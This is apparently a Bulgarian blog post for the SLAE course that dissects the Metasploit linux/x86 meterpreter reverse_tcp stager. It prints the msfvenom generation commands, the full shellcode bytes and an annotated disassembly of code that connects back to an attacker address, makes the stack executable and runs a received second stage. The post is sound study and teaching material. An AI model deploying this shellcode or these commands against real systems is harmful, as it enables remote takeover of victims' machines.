В тази публикация ще анализираме stager-а linux/x86/meterpreter/reverse_tcp (Mettle) с libemu и ще разгледаме дизасемблирания му код с ndisasm.

Опции на полезния товар (payload)

root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp --payload-options
Options for payload/linux/x86/meterpreter/reverse_tcp:
Name: Linux Mettle x86, Reverse TCP Stager
     Module: payload/linux/x86/meterpreter/reverse_tcp
   Platform: Linux, Linux
       Arch: x86
Needs Admin: No
 Total size: 245
       Rank: Normal
Provided by:
    William Webb <[email protected]>
    skape <[email protected]>
    egypt <[email protected]>
    tkmru
Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
Description:
  Inject the mettle server payload (staged). Connect back to the 
  attacker

Генериране на C shellcode

root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.1.1 LPORT=4444 -f c
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of c file: 543 bytes
/* Raw (unencoded) linux/x86/meterpreter/reverse_tcp stager as generated
 * above with LHOST=10.11.1.1 LPORT=4444 -- 123 bytes.
 * The target address is embedded as the immediates of two "push dword"
 * instructions: 0x0a0b0101 (10.11.1.1) and 0x5c110002 (sin_family=2,
 * sin_port=0x115c = 4444 in network byte order); changing LHOST/LPORT
 * changes only those bytes. See the ndisasm listing further down for the
 * instruction-level walkthrough. */
unsigned char buf[] = 
"\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89"
"\xe1\xcd\x80\x97\x5b\x68\x0a\x0b\x01\x01\x68\x02\x00\x11\x5c"
"\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x85\xc0"
"\x79\x19\x4e\x74\x3d\x68\xa2\x00\x00\x00\x58\x6a\x00\x6a\x05"
"\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd\xeb\x27\xb2\x07\xb9"
"\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd"
"\x80\x85\xc0\x78\x10\x5b\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80"
"\x85\xc0\x78\x02\xff\xe1\xb8\x01\x00\x00\x00\xbb\x01\x00\x00"
"\x00\xcd\x80";

Анализ на shellcode-а с libemu (sctest)

root@kali:/usr/bin# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.1.1 LPORT=4444 -f raw | ./sctest -vvv -Ss 10000
verbose = 3
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
<code snippet>
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 16845578 (host=10.11.1.1);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;

Горният изход показва, че shellcode-ът създава TCP сокет (domain=2 → AF_INET, type=1 → SOCK_STREAM) и се свързва към 10.11.1.1 на порт 4444 — точно както в първите ни две задачи. Стойността addrlen = 102 (0x66) не е грешка в емулацията: stager-ът подава номера на socketcall като дължина на адреса, а ядрото изисква само тя да е поне sizeof(struct sockaddr_in); полето sin_zero се игнорира. Обърнете внимание, че libemu извежда само socket() и connect() — останалата част от логиката (mprotect, read и скокът към втория етап) се вижда едва в дизасемблирания код по-долу.

С ndisasm (опцията -u задава 32-битов режим) превръщаме суровите байтове на shellcode-а обратно в асемблерен код:

root@kali:~# echo -ne "\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80\x97\x5b\x68\x0a\x0b\x01\x01\x68\x02\x00\x11\x5c\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x85\xc0\x79\x19\x4e\x74\x3d\x68\xa2\x00\x00\x00\x58\x6a\x00\x6a\x05\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd\xeb\x27\xb2\x07\xb9\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x85\xc0\x78\x10\x5b\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\x85\xc0\x78\x02\xff\xe1\xb8\x01\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80" | ndisasm -u -
; Metasploit linux/x86/meterpreter/reverse_tcp stager (123 bytes), dumped with ndisasm -u.
; Structure: socket() -> connect() with up to 10 attempts (5 s nanosleep between them)
;   -> mprotect() the current stack page RWX -> read() the next stage from the socket
;   onto the stack -> jmp into it. Any failing syscall ends in exit(1) at 0x6f.
; i386 int 0x80 convention: eax = syscall number / return value, ebx/ecx/edx = args 1-3;
; the kernel preserves every register except eax, which the code below relies on.
00000000  6A0A              push byte +0xa
00000002  5E                pop esi                  ; esi = 10: connect() retry counter (see 0x2f)
00000003  31DB              xor ebx,ebx              ; ebx = 0 (retry loop re-enters here, so esi is kept)
00000005  F7E3              mul ebx                  ; edx:eax = eax*0 -> eax = 0 AND edx = 0 (edx=0 is reused at 0x48)
00000007  53                push ebx                 ; protocol = 0
00000008  43                inc ebx                  ; ebx = 1 = SYS_SOCKET (socketcall sub-function)
00000009  53                push ebx                 ; type = 1 = SOCK_STREAM
0000000A  6A02              push byte +0x2           ; domain = 2 = AF_INET
0000000C  B066              mov al,0x66              ; eax = 0x66 = 102 = sys_socketcall
0000000E  89E1              mov ecx,esp              ; ecx -> {2, 1, 0} = socket() argument array
00000010  CD80              int 0x80                 ; socketcall(SYS_SOCKET, args) -> eax = sockfd
00000012  97                xchg eax,edi             ; edi = sockfd (saved for connect/read); eax = junk
00000013  5B                pop ebx                  ; ebx = 2 (pops the AF_INET value, reused as base for SYS_CONNECT)
00000014  680A0B0101        push dword 0x1010b0a     ; sin_addr = 0a 0b 01 01 = 10.11.1.1
00000019  680200115C        push dword 0x5c110002    ; sin_family = 2 (AF_INET), sin_port = 0x115c = 4444 (network order)
0000001E  89E1              mov ecx,esp              ; ecx -> struct sockaddr_in (only the first 8 bytes are meaningful)
00000020  6A66              push byte +0x66
00000022  58                pop eax                  ; eax = 0x66 = sys_socketcall
00000023  50                push eax                 ; addrlen = 0x66 = 102 (number reused as length; kernel only needs >= 16)
00000024  51                push ecx                 ; &sockaddr_in
00000025  57                push edi                 ; sockfd
00000026  89E1              mov ecx,esp              ; ecx -> {sockfd, &addr, addrlen} = connect() argument array
00000028  43                inc ebx                  ; ebx = 3 = SYS_CONNECT
00000029  CD80              int 0x80                 ; socketcall(SYS_CONNECT, args) -> eax = 0 on success, -errno on failure
0000002B  85C0              test eax,eax
0000002D  7919              jns 0x48                 ; connect() succeeded (eax >= 0) -> go to mprotect at 0x48
0000002F  4E                dec esi                  ; one attempt used up
00000030  743D              jz 0x6f                  ; ZF=1 -> counter reached 0, all 10 attempts failed -> exit(1)
00000032  68A2000000        push dword 0xa2
00000037  58                pop eax                  ; eax = 0xa2 = 162 = sys_nanosleep
00000038  6A00              push byte +0x0           ; timespec.tv_nsec = 0
0000003A  6A05              push byte +0x5           ; timespec.tv_sec  = 5
0000003C  89E3              mov ebx,esp              ; ebx -> req = {5, 0} -> sleep 5 seconds
0000003E  31C9              xor ecx,ecx              ; rem = NULL
00000040  CD80              int 0x80                 ; nanosleep(&req, NULL)
00000042  85C0              test eax,eax
00000044  79BD              jns 0x3                  ; sleep completed -> retry from 0x3 (new socket; stack is not unwound, esi kept)
00000046  EB27              jmp short 0x6f           ; nanosleep failed (e.g. interrupted) -> exit(1)
00000048  B207              mov dl,0x7               ; edx = 7 = PROT_READ|PROT_WRITE|PROT_EXEC (upper bytes are 0 from mul at 0x5)
0000004A  B900100000        mov ecx,0x1000           ; len = 4096 = one page
0000004F  89E3              mov ebx,esp
00000051  C1EB0C            shr ebx,byte 0xc
00000054  C1E30C            shl ebx,byte 0xc         ; ebx = esp & ~0xfff = base of the page holding the current stack pointer
00000057  B07D              mov al,0x7d              ; eax = 0x7d = 125 = sys_mprotect (eax was 0 = connect() result)
00000059  CD80              int 0x80                 ; mprotect(page, 0x1000, RWX): make the stack page executable for the stage
0000005B  85C0              test eax,eax
0000005D  7810              js 0x6f                  ; mprotect failed (eax < 0) -> exit(1)
0000005F  5B                pop ebx                  ; ebx = sockfd (pushed at 0x25) = fd for read()
00000060  89E1              mov ecx,esp              ; ecx = esp = destination buffer: the stage is read straight onto the stack
00000062  99                cdq                      ; edx = sign(eax) = 0 (mprotect returned 0)
00000063  B60C              mov dh,0xc               ; edx = 0x0c00 = 3072 = count (NOT 0xc: dh is the second byte)
00000065  B003              mov al,0x3               ; eax = 3 = sys_read
00000067  CD80              int 0x80                 ; read(sockfd, esp, 0xc00) -> eax = bytes received
00000069  85C0              test eax,eax
0000006B  7802              js 0x6f                  ; read error (eax < 0) -> exit(1)
; NOTE(review): only a negative result is rejected. A 0-byte read (peer closed the
; connection) and a short read are not checked, so jmp ecx would execute whatever is
; on the stack; there is no loop to read the full 0xC00 bytes. Also, since the
; buffer starts at esp but only the page containing esp was made RWX, a stage
; larger than (page end - esp) would spill past the executable page -- presumably
; fine for the stage Metasploit actually sends, but worth confirming.
0000006D  FFE1              jmp ecx                  ; transfer control to the received stage on the stack
0000006F  B801000000        mov eax,0x1              ; eax = 1 = sys_exit (shared error/exhaustion exit)
00000074  BB01000000        mov ebx,0x1              ; status = 1
00000079  CD80              int 0x80                 ; exit(1)
root@kali:~#

Shellcode-ът започва със създаване на TCP сокет и обратно свързване (reverse connect) към машината на атакуващия. Ако connect() се провали, има цикъл за повторни опити: esi е инициализиран с 10, след всеки неуспех се извиква sys_nanosleep за 5 секунди (timespec {5, 0}) и се скача обратно към адрес 0x3, докато броячът стигне 0. При успешно свързване инструкцията jns 0x48 прескача към mov dl,0x7 — тази част подготвя и изпълнява sys_mprotect, който прави страницата от стека, в която е esp, четима, записваема и изпълнима (PROT_READ|PROT_WRITE|PROT_EXEC, 0x1000 байта). Следващата част извиква sys_read, който прочита до 0xC00 байта от сокета директно върху стека, а jmp ecx предава управлението на получения код (втория етап). Всяка грешка води до sys_exit с код 1. Заслужава си да се отбележи, че stager-ът проверява само за отрицателен резултат от read(): нито 0 прочетени байта (затворена връзка), нито непълно четене се обработват, и в двата случая се стига до jmp ecx.

Тази публикация в блога е създадена за изпълнение на изискванията на сертифицирането SecurityTube Linux Assembly Expert:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
ID на студент: SLAE-1414